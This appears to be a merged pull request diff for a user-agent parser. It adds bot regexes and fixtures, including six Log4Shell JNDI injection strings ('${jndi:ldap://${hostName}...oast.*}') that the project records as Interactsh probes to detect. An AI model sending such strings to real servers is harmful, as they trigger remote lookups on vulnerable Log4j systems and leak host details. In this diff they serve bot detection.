Adds detection for various bots #7612

Merged 15 commits on Mar 11, 2024
6 changes: 6 additions & 0 deletions Tests/Parser/Client/fixtures/library.yml
@@ -641,3 +641,9 @@
type: library
name: Kiwi TCMS API
version: 12.7
-
user_agent: electron-fetch/1.0 electron (+https://github.com/arantes555/electron-fetch)
client:
type: library
name: Electron Fetch
version: "1.0"
146 changes: 143 additions & 3 deletions Tests/fixtures/bots.yml
@@ -1331,7 +1331,7 @@
-
user_agent: Googlebot-News (2.3.3, ruby 1.9.3 (2013-11-22))
bot:
-    name: Googlebot
+    name: Googlebot News
category: Search bot
url: https://developers.google.com/search/docs/crawling-indexing/overview-google-crawlers
producer:
@@ -4203,8 +4203,8 @@
url: https://github.com/projectdiscovery/httpx
category: Crawler
producer:
-      name: ""
-      url: ""
+      name: ProjectDiscovery, Inc.
+      url: https://projectdiscovery.io/
-
user_agent: 'Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: [email protected]'
bot:
@@ -7205,3 +7205,143 @@
producer:
name: Open Technologies Bulgaria, Ltd.
url: https://kiwitcms.org
-
user_agent: Googlebot-News
bot:
name: Googlebot News
category: Search bot
url: https://developers.google.com/search/docs/crawling-indexing/overview-google-crawlers
producer:
name: Google Inc.
url: https://www.google.com/
-
user_agent: '${jndi:ldap://${hostName}.useragent.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oast.live}'
bot:
name: Interactsh
category: Security Checker
url: https://github.com/projectdiscovery/interactsh
producer:
name: ProjectDiscovery, Inc.
url: https://projectdiscovery.io/
-
user_agent: '${jndi:ldap://${hostName}.useragent.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oast.pro}'
bot:
name: Interactsh
category: Security Checker
url: https://github.com/projectdiscovery/interactsh
producer:
name: ProjectDiscovery, Inc.
url: https://projectdiscovery.io/
-
user_agent: '${jndi:ldap://${hostName}.useragent.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oast.online}'
bot:
name: Interactsh
category: Security Checker
url: https://github.com/projectdiscovery/interactsh
producer:
name: ProjectDiscovery, Inc.
url: https://projectdiscovery.io/
-
user_agent: '${jndi:ldap://${hostName}.useragent.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oast.site}'
bot:
name: Interactsh
category: Security Checker
url: https://github.com/projectdiscovery/interactsh
producer:
name: ProjectDiscovery, Inc.
url: https://projectdiscovery.io/
-
user_agent: '${jndi:ldap://${hostName}.useragent.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oast.fun}'
bot:
name: Interactsh
category: Security Checker
url: https://github.com/projectdiscovery/interactsh
producer:
name: ProjectDiscovery, Inc.
url: https://projectdiscovery.io/
-
user_agent: '${jndi:ldap://${hostName}.useragent.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oast.me}'
bot:
name: Interactsh
category: Security Checker
url: https://github.com/projectdiscovery/interactsh
producer:
name: ProjectDiscovery, Inc.
url: https://projectdiscovery.io/
-
user_agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36 webtru_crawler
bot:
name: webtru
category: Crawler
url: https://webtru.io/
producer:
name: DataSign Inc.
url: https://datasign.jp/
-
user_agent: Mozilla / 5.0(Windows NT 10.0; Win64; x64) AppleWebKit / 537.36(KHTML, like Gecko; compatible; URLSuMaBot / 1.0; +https://www.urlsuma.de/bot.aspx) Chrome / 70.0.3538.77 Safari / 537.36
bot:
name: URLSuMaBot
category: Crawler
url: https://www.urlsuma.de/
-
user_agent: Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322) 360JK yunjiankong 427691
bot:
name: 360JK
category: Site Monitor
url: http://jk.cloud.360.cn/
producer:
name: 360 Security Technology Inc.
url: https://www.360.cn/
-
user_agent: LinkChain
bot:
name: Generic Bot
-
user_agent: Morfeus Fucking Scanner
bot:
name: Generic Bot
-
user_agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101 Firefox/80.0 UCSBNetworkMeasurement/2023 (contact; stijn; at; ucsb.edu;)
bot:
name: UCSB Network Measurement
category: Crawler
url: https://www.it.ucsb.edu/
producer:
name: University of California, Santa Barbara
url: https://www.it.ucsb.edu/
-
user_agent: Plesk screenshot bot https://support.plesk.com/hc/en-us/articles/10301006946066
bot:
name: Plesk Screenshot Service
category: Service Agent
url: https://support.plesk.com/hc/en-us/articles/13302778306199-What-is-Plesk-Screenshot-Service
producer:
name: Plesk International GmbH
url: https://www.plesk.com/
-
user_agent: Y!J-ASR/1.0 crawler (https://support.yahoo-net.jp/PccSearch/s/article/H000007955)
bot:
name: Yahoo! Japan ASR
category: Crawler
url: https://support.yahoo-net.jp/PccSearch/s/article/H000007955
producer:
name: Yahoo! Japan Corp.
url: https://www.yahoo.co.jp/
-
user_agent: Who.is Bot
bot:
name: Who.is Bot
category: Crawler
url: https://who.is/
-
user_agent: Mozilla/5.0 (compatible; WireReaderBot/1.0; +https://wirereader.app)
bot:
name: WireReaderBot
category: Feed Fetcher
url: https://wirereader.app/
-
user_agent: WireReaderBot/1.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
bot:
name: WireReaderBot
category: Feed Fetcher
url: https://wirereader.app/
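
As a quick sanity check on the fixtures above, the sketch below runs a few of the new user agents against the literal patterns this PR adds to regexes/bots.yml. It is written in Python rather than with the project's own test harness, and it assumes plain case-insensitive search (`re.search` with `re.IGNORECASE`); the real parser may wrap or anchor patterns differently. `CASES` and `matches` are hypothetical names used only for illustration.

```python
import re

# (pattern added to regexes/bots.yml in this PR, expected bot name, fixture user agent)
CASES = [
    (r".*\.oast\.", "Interactsh",
     "${jndi:ldap://${hostName}.useragent.xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oast.live}"),
    (r"webtru_crawler", "webtru",
     "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 "
     "(KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36 webtru_crawler"),
    (r"360JK yunjiankong", "360JK",
     "Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322) "
     "360JK yunjiankong 427691"),
    (r"Plesk screenshot bot", "Plesk Screenshot Service",
     "Plesk screenshot bot https://support.plesk.com/hc/en-us/articles/10301006946066"),
    (r"Who.is", "Who.is Bot", "Who.is Bot"),
]


def matches(pattern, user_agent):
    """Assumption: case-insensitive search anywhere in the user agent."""
    return re.search(pattern, user_agent, re.IGNORECASE) is not None


if __name__ == "__main__":
    for pattern, name, user_agent in CASES:
        status = "ok" if matches(pattern, user_agent) else "MISSING"
        print(f"{status:8} {name}")
```

One thing the sketch makes visible: the dot in `Who.is` is unescaped, so under these assumptions it also matches a string such as `Whoxis`. Escaping it as `Who\.is` would be stricter, if that is the intent.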
87 changes: 83 additions & 4 deletions regexes/bots.yml
@@ -5,6 +5,11 @@
# @license http://www.gnu.org/licenses/lgpl.html LGPL v3 or later
###############

- regex: 'WireReaderBot(?:/([\d+.]+))?'
name: 'WireReaderBot'
category: 'Feed Fetcher'
url: 'https://wirereader.app/'

- regex: 'monitoring360bot'
name: '360 Monitoring'
category: 'Site Monitor'
@@ -768,6 +773,14 @@
name: 'Visual Meta'
url: 'https://www.shopalike.cz/'

- regex: 'Googlebot-News'
name: 'Googlebot News'
category: 'Search bot'
url: 'https://developers.google.com/search/docs/crawling-indexing/overview-google-crawlers'
producer:
name: 'Google Inc.'
url: 'https://www.google.com/'

- regex: 'Adwords-(?:DisplayAds|Express|Instant)|Google Web Preview|Google[ -]Publisher[ -]Plugin|Google-(?:Ads-Conversions|Ads-Qualify|Adwords|AMPHTML|Assess|Extended|HotelAdsVerifier|InspectionTool|Lens|PageRenderer|Read-Aloud|Safety|Shopping-Quality|Site-Verification|speakr|Stale-Content-Probe|Test|Youtube-Links)|(?:AdsBot|APIs|DuplexWeb|Feedfetcher|Mediapartners)-Google(?:-Mobile)?|Google(?:AdSenseInfeed|AssociationService|bot|Other|Prober|Producer)|Google.*/\+/web/snippet'
name: 'Googlebot'
category: 'Search bot'
@@ -1912,6 +1925,22 @@
name: 'Yahoo! Japan Corp.'
url: 'https://www.yahoo.co.jp/'

- regex: 'Y!J-ASR'
name: 'Yahoo! Japan ASR'
category: 'Crawler'
url: 'https://support.yahoo-net.jp/PccSearch/s/article/H000007955'
producer:
name: 'Yahoo! Japan Corp.'
url: 'https://www.yahoo.co.jp/'

- regex: '^Y!J'
name: 'Yahoo! Japan'
category: 'Crawler'
url: 'https://support.yahoo-net.jp/PccSearch/s/article/H000007955'
producer:
name: 'Yahoo! Japan Corp.'
url: 'https://www.yahoo.co.jp/'

- regex: 'Yandex(?:(?:\.Gazeta |Accessibility|Mobile|MobileScreenShot|RenderResources|Screenshot|Sprav)?Bot|(?:AdNet|Antivirus|Blogs|Calendar|Catalog|Direct|Favicons|ForDomain|ImageResizer|Images|Market|Media|Metrika|News|OntoDB(?:API)?|Pagechecker|Partner|RCA|SearchShop|(?:News|Site)links|Tracker|Turbo|Userproxy|Verticals|Vertis|Video|Webmaster))|YaDirectFetcher'
name: 'Yandex Bot'
category: 'Search bot'
@@ -2576,8 +2605,16 @@
url: 'https://github.com/projectdiscovery/httpx'
category: 'Crawler'
producer:
-    name: ''
-    url: ''
+    name: 'ProjectDiscovery, Inc.'
+    url: 'https://projectdiscovery.io/'

- regex: '.*\.oast\.'
name: 'Interactsh'
category: 'Security Checker'
url: 'https://github.com/projectdiscovery/interactsh'
producer:
name: 'ProjectDiscovery, Inc.'
url: 'https://projectdiscovery.io/'

- regex: 'scaninfo@(?:expanseinc|paloaltonetworks)\.com'
name: 'Expanse'
@@ -4237,10 +4274,52 @@
name: 'Open Technologies Bulgaria, Ltd.'
url: 'https://kiwitcms.org'

- regex: 'webtru_crawler'
name: 'webtru'
category: 'Crawler'
url: 'https://webtru.io/'
producer:
name: 'DataSign Inc.'
url: 'https://datasign.jp/'

- regex: 'URLSuMaBot'
name: 'URLSuMaBot'
category: 'Crawler'
url: 'https://www.urlsuma.de/'

- regex: '360JK yunjiankong'
name: '360JK'
category: 'Site Monitor'
url: 'http://jk.cloud.360.cn/'
producer:
name: '360 Security Technology Inc.'
url: 'https://www.360.cn/'

- regex: 'UCSBNetworkMeasurement'
name: 'UCSB Network Measurement'
category: 'Crawler'
url: 'https://www.it.ucsb.edu/'
producer:
name: 'University of California, Santa Barbara'
url: 'https://www.it.ucsb.edu/'

- regex: 'Plesk screenshot bot'
name: 'Plesk Screenshot Service'
category: 'Service Agent'
url: 'https://support.plesk.com/hc/en-us/articles/13302778306199-What-is-Plesk-Screenshot-Service'
producer:
name: 'Plesk International GmbH'
url: 'https://www.plesk.com/'

- regex: 'Who.is'
name: 'Who.is Bot'
category: 'Crawler'
url: 'https://who.is/'

# Generic bots
-- regex: 'nuhk|grub-client|Download Demon|SearchExpress|Microsoft URL Control|borg|altavista|dataminr\.com|teoma|oegp|http%20client|htdig|mogimogi|larbin|scrubby|searchsight|semanticdiscovery|snappy|vortex(?!(?: Build|Plus))|zeal(?!ot)|dataparksearch|findlinks|BrowserMob|URL2PNG|ZooShot|GomezA|Google SketchUp|Read%20Later|7Siters|centuryb\.o\.t9|InterNaetBoten|EasyBib AutoCite|Bidtellect|tomnomnom/meg|cortex|Re-re Studio|adreview|AHC/|NameOfAgent|Request-Promise|ALittle Client|Hello,? world|wp_is_mobile|0xAbyssalDoesntExist|Anarchy99|^revolt|nvd0rz|xfa1|Hakai|gbrmss|fuck-your-hp|IDBTE4M CODE87|Antoine|Insomania|Hells-Net|b3astmode|Linux Gnu \(cow\)|Test Certificate Info|iplabel|Magellan|TheSafex?Internetx?Search|Searcherweb|kirkland-signature|^xenu|^ZmEu|^(?:chrome|firefox|Zeus)$'
+- regex: 'nuhk|grub-client|Download Demon|SearchExpress|Microsoft URL Control|borg|altavista|dataminr\.com|teoma|oegp|http%20client|htdig|mogimogi|larbin|scrubby|searchsight|semanticdiscovery|snappy|vortex(?!(?: Build|Plus))|zeal(?!ot)|dataparksearch|findlinks|BrowserMob|URL2PNG|ZooShot|GomezA|Google SketchUp|Read%20Later|7Siters|centuryb\.o\.t9|InterNaetBoten|EasyBib AutoCite|Bidtellect|tomnomnom/meg|cortex|Re-re Studio|adreview|AHC/|NameOfAgent|Request-Promise|ALittle Client|Hello,? world|wp_is_mobile|0xAbyssalDoesntExist|Anarchy99|^revolt|nvd0rz|xfa1|Hakai|gbrmss|fuck-your-hp|IDBTE4M CODE87|Antoine|Insomania|Hells-Net|b3astmode|Linux Gnu \(cow\)|Test Certificate Info|iplabel|Magellan|TheSafex?Internetx?Search|Searcherweb|kirkland-signature|LinkChain|^xenu|^ZmEu|^(?:chrome|firefox|Zeus)$'
name: 'Generic Bot'

# Generic detections
-- regex: '[a-z0-9_-]*(?:(?<!cu|power[ _]|m[ _])bot(?![ _]TAB|[ _]?5[0-9]|[ _]Senior|[ _]Junior)|analyzer|appengine|archiver|checker|collector|crawl|crawler|fetcher|indexer|inspector|monitor|project(?!or)|(?<!Google Wap )proxy|research|resolver|robots|scraper|script|searcher|(?<!dapper-)security|spider|study|transcoder|uptime|user[ _]?agent|validator)(?:[^a-z]|$)'
+- regex: '[a-z0-9_-]*(?:(?<!cu|power[ _]|m[ _])bot(?![ _]TAB|[ _]?5[0-9]|[ _]Senior|[ _]Junior)|analyzer|appengine|archiver|checker|collector|crawl|crawler|fetcher|indexer|inspector|monitor|project(?!or)|(?<!Google Wap )proxy|research|resolver|robots|scanner|scraper|script|searcher|(?<!dapper-)security|spider|study|transcoder|uptime|user[ _]?agent|validator)(?:[^a-z]|$)'
name: 'Generic Bot'
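
The placement of the new entries in this file matters if rules are tried in file order and the first match wins, which is an assumption here rather than something this diff states. Under that assumption, the Python sketch below shows why `Googlebot-News` sits before the broad Googlebot rule, why `Y!J-ASR` sits before `^Y!J`, and why `WireReaderBot` at the top of the file wins for a user agent that also mentions Googlebot. The Googlebot pattern is an abbreviated stand-in for the long alternation in the diff, and `BOT_RULES` and `first_match` are hypothetical names.

```python
import re

# Ordered (pattern, name) pairs, listed in the same relative order as the diff.
BOT_RULES = [
    (r"WireReaderBot(?:/([\d+.]+))?", "WireReaderBot"),
    (r"Googlebot-News", "Googlebot News"),
    (r"Google(?:bot|Other)", "Googlebot"),  # abbreviated stand-in, not the full rule
    (r"Y!J-ASR", "Yahoo! Japan ASR"),
    (r"^Y!J", "Yahoo! Japan"),
]


def first_match(user_agent, rules=BOT_RULES):
    """Return the name of the first rule that matches, or None.

    Assumption: rules are evaluated top to bottom, case-insensitively.
    """
    for pattern, name in rules:
        if re.search(pattern, user_agent, re.IGNORECASE):
            return name
    return None


if __name__ == "__main__":
    for ua in (
        "Googlebot-News",
        "Y!J-ASR/1.0 crawler (https://support.yahoo-net.jp/PccSearch/s/article/H000007955)",
        "WireReaderBot/1.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
    ):
        print(first_match(ua), "<-", ua)
```

Reversing the list (`first_match(ua, BOT_RULES[::-1])`) makes the broader rules shadow the specific ones, which is the failure mode the ordering in the diff appears to avoid.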
5 changes: 5 additions & 0 deletions regexes/client/libraries.yml
@@ -250,6 +250,11 @@
version: '$1'
url: 'https://github.com/node-fetch/node-fetch'

- regex: 'electron-fetch/?(\d+[\.\d]+)?'
name: 'Electron Fetch'
version: '$1'
url: 'https://github.com/arantes555/electron-fetch'

- regex: 'ReactorNetty/(\d+[\.\d]+)'
name: 'ReactorNetty'
version: '$1'
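
To illustrate how the `electron-fetch` rule's `$1` capture lines up with the `version: "1.0"` fixture, here is a minimal Python sketch. It assumes the pattern is applied as a case-insensitive search and that `$1` refers to the first capture group; `electron_fetch_version` is a hypothetical helper, not part of the project.

```python
import re

# Pattern copied from the new libraries.yml entry.
ELECTRON_FETCH = re.compile(r"electron-fetch/?(\d+[\.\d]+)?", re.IGNORECASE)


def electron_fetch_version(user_agent):
    """Return the captured version, '' if the group is empty, None if no match."""
    m = ELECTRON_FETCH.search(user_agent)
    if m is None:
        return None
    return m.group(1) or ""


if __name__ == "__main__":
    ua = "electron-fetch/1.0 electron (+https://github.com/arantes555/electron-fetch)"
    print(repr(electron_fetch_version(ua)))
```

Because the group is `\d+[\.\d]+`, it needs at least two version characters: `electron-fetch/12` yields `12`, while a bare `electron-fetch/2` still matches the rule but leaves the version empty.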